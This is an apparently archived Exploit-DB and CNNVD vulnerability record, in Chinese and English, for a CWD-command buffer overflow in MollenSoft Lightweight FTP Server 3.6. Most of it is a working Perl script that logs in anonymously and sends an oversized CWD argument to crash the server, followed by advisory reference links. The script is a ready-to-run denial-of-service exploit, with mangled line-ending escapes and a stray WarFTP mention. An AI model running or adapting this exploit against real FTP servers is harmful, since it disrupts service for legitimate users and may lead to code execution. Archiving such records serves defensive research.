https://www.exploit-db.com/exploits/24142
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200403-101

MollenSoftLightweightFTPServer是一款小型FTP服务程序。LightweightFTP服务程序对CWD命令参数缺少充分边界检查，远程攻击者可以利用这个漏洞对FTP进行拒绝服务攻击，可能以进程权限执行任意指令。提交包含超长字符串的CWD命令，可发生缓冲区溢出，精心构建提交数据可能以进程权限执行任意指令。

source: http://www.securityfocus.com/bid/10409/info

A denial of service condition is reported to exist in the MollenSoft Lightweight FTP Server that may allow a remote user to deny service to legitimate FTP users. The vulnerability is due to a lack of sufficient boundary checks performed on CWD command arguments.

It should be noted that although this vulnerability is reported to affect Mollensoft Lightweight FTP Server version 3.6 other versions might also be affected. 

#!/usr/bin/perl
#
# Mollensoft FTP Server CMD Buffer Overflow
#
# Orkut users? Come join the SecuriTeam community
# http://www.orkut.com/Community.aspx?cmm=44441

use strict;
use IO::Socket::INET;

usage() unless (@ARGV == 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
$socket or die "Cannot connect to host!n";

$socket->autoflush(1);

# receive greeting
my $repcode = "220 ";
my $response = recv_reply($socket, $repcode);
print $response;

# send USER command
#my $username = "%00" x 2041;
my $username = "anonymous";
print "USER $usernamern";
print $socket "USER $usernamern";

select(undef, undef, undef, 0.002); # sleep of 2 milliseconds

# send PASS command
my $password = "[email protected]";
print "PASS $passwordrn";
print $socket "PASS $passwordrn";

my $cmd = "CWD ";
$cmd .= "A" x 224; # Value can range from 224 to 1018
$cmd .= "rn";
print "length: ".length($cmd)."n";
print $socket $cmd;

$repcode = "";
recv_reply($socket, $repcode);

close($socket);
exit(0);

sub usage
{
 # print usage information
 print "nUsage:  Mollensoft_FTP_Server_crash.pl <host> <port>n
<host> - The host to connect to
<port> - The TCP port which WarFTP is listening onnn";
 exit(1);
}

sub recv_reply
{
 # retrieve any reply
 my $socket = shift;
 my $repcode = shift;
 $socket or die "Can't receive on socketn";

 my $res="";
 while(<$socket>)
 {
  $res .= $_;
  if (/$repcode/) { last; }
 }
 return $res;
}

来源:XF
名称:mollensoft-cwd-command-bo(16237)
链接:http://xforce.iss.net/xforce/xfdb/16237
来源:OSVDB
名称:6412
链接:http://www.osvdb.org/6412
来源:XF
名称:mollensoft-cd-bo(16303)
链接:http://xforce.iss.net/xforce/xfdb/16303
来源:BID
名称:10429
链接:http://www.securityfocus.com/bid/10429
来源:BID
名称:10409
链接:http://www.securityfocus.com/bid/10409
来源:BUGTRAQ
名称:20040601MollensoftLightweightFTPServerCWDBufferOverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108611230015042&w;=2
来源:BUGTRAQ
名称:20040528MollensoftftpServerver3.6Bufferoverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108577846011604&w;=2
来源:SECTRACK
名称:1010328
链接:http://securitytracker.com/id?1010328